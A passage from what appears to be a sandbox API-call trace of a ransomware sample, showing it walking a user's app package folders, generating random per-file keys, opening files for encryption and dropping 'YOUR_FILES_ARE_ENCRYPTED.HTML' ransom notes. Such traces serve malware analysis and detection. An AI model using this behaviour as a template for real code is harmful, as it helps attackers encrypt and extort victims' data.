GetProcessHeap () returned 0x600000 [0119.926] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.927] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Microsoft.WindowsAlarms_10.1510.12020.0_x64__8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Microsoft.WindowsAlarms_10.1510.12020.0_x64__8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Microsoft.WindowsAlarms_10.1510.12020.0_x64__8wekyb3d8bbwe" [0119.927] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Microsoft.WindowsAlarms_10.1510.12020.0_x64__8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Microsoft.WindowsAlarms_10.1510.12020.0_x64__8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Microsoft.WindowsAlarms_10.1510.12020.0_x64__8wekyb3d8bbwe\\*" [0119.927] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Microsoft.WindowsAlarms_10.1510.12020.0_x64__8wekyb3d8bbwe\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda459b8, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xeda459b8, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xeda459b8, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da3c6, dwReserved1=0x6da318, cFileName=".", cAlternateFileName="")) returned 0x626638 [0119.927] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda459b8, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xeda459b8, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xeda459b8, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da3c6, dwReserved1=0x6da318, cFileName="..", cAlternateFileName="")) returned 1 [0119.927] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda459b8, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xeda459b8, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xedade28a, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da3c6, dwReserved1=0x6da318, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0119.927] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.927] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Microsoft.WindowsAlarms_10.1510.12020.0_x64__8wekyb3d8bbwe\\ActivationStore") returned 161 [0119.927] GetProcessHeap () returned 0x600000 [0119.928] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0119.928] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Microsoft.WindowsAlarms_10.1510.12020.0_x64__8wekyb3d8bbwe\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Microsoft.WindowsAlarms_10.1510.12020.0_x64__8wekyb3d8bbwe\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Microsoft.WindowsAlarms_10.1510.12020.0_x64__8wekyb3d8bbwe\\ActivationStore" [0119.928] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Microsoft.WindowsAlarms_10.1510.12020.0_x64__8wekyb3d8bbwe\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Microsoft.WindowsAlarms_10.1510.12020.0_x64__8wekyb3d8bbwe\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Microsoft.WindowsAlarms_10.1510.12020.0_x64__8wekyb3d8bbwe\\ActivationStore\\*" [0119.928] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Microsoft.WindowsAlarms_10.1510.12020.0_x64__8wekyb3d8bbwe\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda459b8, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xeda459b8, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xedade28a, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6da320, cFileName=".", cAlternateFileName="")) returned 0x626978 [0119.929] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda459b8, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xeda459b8, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xedade28a, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6da320, cFileName="..", cAlternateFileName="")) returned 1 [0119.929] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeda459b8, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf23e2479, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xeddd9163, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x6b4210, dwReserved1=0x6da320, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0119.929] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.929] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Microsoft.WindowsAlarms_10.1510.12020.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned 181 [0119.929] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0119.929] lstrlenW (lpString=".dat") returned 4 [0119.929] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0119.929] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0119.929] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Microsoft.WindowsAlarms_10.1510.12020.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\microsoft.windowsalarms_10.1510.12020.0_x64__8wekyb3d8bbwe\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0119.930] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=32768) returned 1 [0119.930] GetProcessHeap () returned 0x600000 [0119.930] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0119.933] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="6A") returned 2 [0119.933] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="DB") returned 2 [0119.933] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="11") returned 2 [0119.933] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="10") returned 2 [0119.933] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="BB") returned 2 [0119.933] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="BA") returned 2 [0119.933] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="93") returned 2 [0119.933] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="A5") returned 2 [0119.933] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="CA") returned 2 [0119.933] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="E0") returned 2 [0119.933] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="D9") returned 2 [0119.933] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="6D") returned 2 [0119.933] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="35") returned 2 [0119.933] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="73") returned 2 [0119.933] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="3E") returned 2 [0119.933] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="11") returned 2 [0119.933] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="3D") returned 2 [0119.933] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="CF") returned 2 [0119.933] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="D4") returned 2 [0119.933] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="A6") returned 2 [0119.933] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="B3") returned 2 [0119.933] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="A4") returned 2 [0119.933] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="6E") returned 2 [0119.933] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="7A") returned 2 [0119.933] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="F5") returned 2 [0119.933] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="DF") returned 2 [0119.933] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="7C") returned 2 [0119.933] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="D7") returned 2 [0119.933] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="C9") returned 2 [0119.934] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="6A") returned 2 [0119.934] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="F2") returned 2 [0119.934] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="7B") returned 2 [0119.934] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Microsoft.WindowsAlarms_10.1510.12020.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Microsoft.WindowsAlarms_10.1510.12020.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Microsoft.WindowsAlarms_10.1510.12020.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" [0119.934] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.934] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0119.934] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xedade28a, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xedade28a, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xedade28a, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0x6b4210, dwReserved1=0x6da320, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0119.934] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.934] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Microsoft.WindowsAlarms_10.1510.12020.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG1") returned 186 [0119.934] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0119.934] lstrlenW (lpString=".LOG1") returned 5 [0119.934] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0119.934] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xedade28a, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xedade28a, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xedade28a, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6da320, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0119.934] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.934] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Microsoft.WindowsAlarms_10.1510.12020.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG2") returned 186 [0119.934] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0119.934] lstrlenW (lpString=".LOG2") returned 5 [0119.935] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0119.935] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xedade28a, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xedade28a, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xedade28a, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6da320, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0119.935] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0119.935] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Microsoft.WindowsAlarms_10.1510.12020.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 191 [0119.935] GetProcessHeap () returned 0x600000 [0119.935] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3106fd8 [0119.936] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Microsoft.WindowsAlarms_10.1510.12020.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\microsoft.windowsalarms_10.1510.12020.0_x64__8wekyb3d8bbwe\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0119.937] WriteFile (in: hFile=0x324, lpBuffer=0x3106fd8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3106fd8*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.938] CloseHandle (hObject=0x324) returned 1 [0119.938] GetProcessHeap () returned 0x600000 [0119.938] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0119.938] GetProcessHeap () returned 0x600000 [0119.938] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.938] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda459b8, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xeda459b8, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xedade28a, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da3c6, dwReserved1=0x6da318, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0119.938] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0119.938] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Microsoft.WindowsAlarms_10.1510.12020.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 175 [0119.938] GetProcessHeap () returned 0x600000 [0119.938] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.938] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Microsoft.WindowsAlarms_10.1510.12020.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\microsoft.windowsalarms_10.1510.12020.0_x64__8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.943] WriteFile (in: hFile=0x320, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.946] CloseHandle (hObject=0x320) returned 1 [0119.946] GetProcessHeap () returned 0x600000 [0119.946] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.946] GetProcessHeap () returned 0x600000 [0119.946] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.946] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec6e67c2, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec6e67c2, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec6e67c2, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0119.946] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.946] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\RoamingState") returned 99 [0119.946] GetProcessHeap () returned 0x600000 [0119.946] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.946] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\RoamingState" [0119.946] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\RoamingState\\*" [0119.946] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec6e67c2, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec6e67c2, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec6e67c2, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da3c6, dwReserved1=0x6da318, cFileName=".", cAlternateFileName="")) returned 0x626638 [0119.946] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec6e67c2, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec6e67c2, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec6e67c2, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da3c6, dwReserved1=0x6da318, cFileName="..", cAlternateFileName="")) returned 1 [0119.947] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec6e67c2, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec6e67c2, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec6e67c2, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da3c6, dwReserved1=0x6da318, cFileName="..", cAlternateFileName="")) returned 0 [0119.947] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0119.947] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0119.947] GetProcessHeap () returned 0x600000 [0119.947] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.947] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.948] WriteFile (in: hFile=0x320, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.949] CloseHandle (hObject=0x320) returned 1 [0119.949] GetProcessHeap () returned 0x600000 [0119.949] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.949] GetProcessHeap () returned 0x600000 [0119.949] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.949] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec70c8e4, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec732afa, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec8b023b, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0119.949] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.949] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: 